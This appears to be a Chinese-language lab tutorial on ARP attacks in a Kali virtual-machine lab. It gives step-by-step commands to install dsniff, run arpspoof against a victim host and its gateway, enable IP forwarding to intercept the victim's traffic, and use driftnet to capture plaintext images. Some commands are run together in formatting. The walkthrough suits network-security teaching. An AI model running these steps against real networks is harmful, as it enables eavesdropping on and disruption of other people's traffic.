网络协议与攻击模拟_03实施ARP欺骗和攻击

news/2025/2/12 20:15:05/

一、ARP攻击

1、实验环境

  • kali Linux (安装arpspoof工具)
  • 被攻击主机

2、kali配置

kali Linux系统是基于debian Linux系统,采用deb包管理方式,可以使用apt源的方式进行直接从源的安装。

  • 配置kali网络源
vim /etc/apt/sources.listapt-get-update
  • 安装工具
apt-get install dsniff

3、实验步骤

(1)准备工作

  • windows虚拟机与kali虚拟机的IP和MAC地址如下:

  • 开始Windows可正常访问网络

(2)实施攻击

arpspoof -i eth0 -t 被攻击主机IP地址 被攻击主机网关地址

kali 不停向被攻击主机发送ARP响应,告诉被攻击主机网关的MAC地址是0:c:29:e2:44:49

(3)攻击效果

被攻击主机无法访问网络

  • winshark&arp缓存情况

被攻击主机无法进行网络通信

如果出现了响应报文过多,还跟有可能就是遭受了ARP攻击。

二、实施ARP欺骗

1、开启攻击机的IP转发

开启kali的IP转发

vim /proc/sys/net/ipv4/ip_forward
#这个文件写1代表开启,写0代表关闭echo 1 >> /proc/sys/net/ipv4/ip_forward  

2、被攻击主机可访问网络

  • windows发出的所有数据都会经过kali进行转发。

  • kali自带抓包工具winshark可以抓包看看

如果遇到kali自带的winshark闪退请使用以下命令更新:

apt update &&apt upgrade &&apt dist-upgrade

3、driftne监听工具

(抓取被攻击主机上明文的图片)

#安装driftnet
apt-get install driftnet
#启用driftnet
driftnet -i ethernet0


http://www.ppmy.cn/news/1299165.html

相关文章

如何通过兴趣爱好选职业?

一个错误的选择,可能造成终身的遗憾,一个正确的选择,可以让我们少奋斗几十年。所以无论现在付出多少代价,多花一些时间,去研究以下未来的职业方向,这是值得的。 职业定位(专业定位)…

前端实现搜索功能

最近遇到一个需求,用户在输入框输入关键字之后,点击搜索按钮后进行搜索,如下图,选中的数据在下面,上面展现的是搜索后的数据,现在选中了2条数据: 当用户输入KET后点击搜索,搜出的结果有16条,勾选全选选中后,将选中的16条的数据加到之前已选的2条数据里,于是此时已选…

phpstorm配置ftp

1 选择设置ftp 2设置自动上传

2. Spring Boot 自动配置 Mybatis 流程

1. Spring Boot 自动配置 Mybatis 自动配置过程中做了3个主要bean的创建及很重要的一些事情。 sqlSessionFactory、sqlSessionTemplate、MapperScannerConfigurer 等配置bean的创建。sqlSessionFactory:解析 xml配置文件,并将MappedStatement放入到Has…

2024-01-03 无重叠区间

435. 无重叠区间 思路:和最少数量引爆气球的箭的思路基本都是一致了!贪心就是比较左边的值是否大于下一个右边的值 class Solution:def eraseOverlapIntervals(self, points: List[List[int]]) -> int:points.sort(keylambda x: (x[0], x[1]))# 比较…

以数据资产入表为抓手,推动数据资产化

在数字化时代,数据已经成为企业的重要资产。数据资产化是将数据视为一种有价值的资产,对其进行有效管理和利用的过程。而数据资产入表则是将数据资产纳入财务报表,以反映其价值和对企业财务状况的影响。本文亿信华辰 将深入探讨数据资产化与数…

认证评价的方法

认证评价是对于个人或组织的能力、技能或知识的确认,通常用于确保质量、安全或合规性。以下是一些常用的认证评价方法: 资格审查 资格审查是认证评价的第一步,主要评估个人或组织是否具备参与认证的基本条件。例如,对于某些专业…

计算机网络专栏目录

1. http header 请求头 x-forwarded-for 2. HTTP/HTTPS、TLS/SSL 协议